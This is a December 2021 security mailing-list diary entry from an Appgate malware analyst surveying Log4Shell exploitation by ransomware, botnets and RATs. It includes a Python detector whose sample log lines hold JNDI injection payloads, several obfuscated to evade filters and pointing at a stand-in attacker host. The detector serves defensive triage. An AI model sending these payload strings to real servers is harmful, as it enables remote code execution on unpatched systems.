[MART] - Daily Diary #414 - Log4Shell Exploited By Multiple Threat Actors

CTAS-MAT ctas-mat at appgate.com
Fri Dec 17 21:11:09 UTC 2021


Hello,

I hope everyone is doing well!

Below is the entry for today.

12/17/2021 - Diary entry #414:

Since Log4Shell is a critical flaw with a huge attack surface and is very simple to exploit, threat actors are actively using it to launch their attacks even with a patch already released. Several state-sponsored groups are exploiting the flaw in the wild and making modifications to the Log4j exploit.

We have also seen several non-state-sponsored threat actors exploiting the Log4j vulnerability. Botnets like Muhstik and a Mirai variant, for example, were exploiting the flaw on Linux devices before it was publicly disclosed.

Exploitation and post-exploitation activities were also observed, including the deployment of cryptocurrency miners like XMRIG and Cobalt Strike beacons used to exfiltrate data from compromised systems.

More recently, a new ransomware family named Khonsari emerged, spreading by exploiting the Log4j vulnerability in the wild. We covered this new ransomware yesterday in Daily Diary #413.

The Orcus Remote Access Trojan, active since 2016 and sold commercially among threat actors, was also delivered during a Log4j exploitation attack. Lastly, Conti ransomware was seen exploiting Log4Shell to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

Besides all those threats, simple reverse shell command lines have been executed by exploiting the vulnerability as well, so basically any threat actor can leverage this new vector in the wild, including by using exploit variants to bypass basic security protections on still-unpatched systems. Our team was expecting notorious ransomware groups like LockBit, Hive, and Groove to exploit it and breach new victims, which has already happened, as noted above regarding Conti ransomware.
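The "exploit variants" mentioned above typically wrap the JNDI lookup in other Log4j 2 lookups (such as `lower:`, `upper:`, or the `:-` default-value syntax) so that a naive string match for `${jndi:` misses them. The detection logic below is an added example for this diary entry, not code from Appgate or the MART list; it normalizes nested lookups the way Log4j 2 would resolve them and then flags the resulting JNDI string. The log lines, host name `attacker.example`, and function names are constructed for the example.

```python
import re

# Constructed web-server access log lines (sample input, not real telemetry).
# Lines 2-5 carry a JNDI lookup in the User-Agent field; line 6 carries a
# harmless non-JNDI lookup that must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [17/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [17/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [17/Dec/2021:10:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [17/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - [17/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:dns://attacker.example/a}"',
    '10.0.0.3 - - [17/Dec/2021:10:00:06 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.68"',
]

# Innermost ${...} expression: no nested '$', '{' or '}' inside the braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Final check, applied to the normalized text; case-insensitive on purpose.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def resolve_lookup(content: str):
    """Return the literal a Log4j 2 lookup evaluates to, or None if unknown.

    Handles the three forms seen in obfuscated variants: ${lower:x},
    ${upper:x} and the default-value syntax ${name:-x} (including ${::-x}).
    """
    if content.startswith("lower:"):
        return content[len("lower:"):].lower()
    if content.startswith("upper:"):
        return content[len("upper:"):].upper()
    if ":-" in content:
        return content.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Resolve nested lookups from the inside out, as Log4j 2 would.

    Unknown lookups (jndi:, date:, ...) are left in place; max_rounds bounds
    the work on adversarial input with very deep nesting.
    """
    for _ in range(max_rounds):
        changed = False

        def substitute(match):
            nonlocal changed
            literal = resolve_lookup(match.group(1))
            if literal is None:
                return match.group(0)
            changed = True
            return literal

        text = INNER_LOOKUP.sub(substitute, text)
        if not changed:
            break
    return text


def scan_lines(lines):
    """Return one finding per line whose normalized form contains a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        match = JNDI_LOOKUP.search(normalized)
        if match:
            findings.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "normalized": normalized,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: jndi via {finding['scheme']}")
```

Run against a real access log, the normalizer makes a plain `${jndi:` signature catch the lower/upper/default-value variants without having to enumerate each spelling; it is a triage aid, and patching Log4j remains the fix.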

Kind Regards,




Felipe Tarijon de Almeida
Malware Analyst
Appgate

E: felipe.tarijon at appgate.com<mailto:felipe.tarijon at appgate.com>
O: +55 11 97467 9549
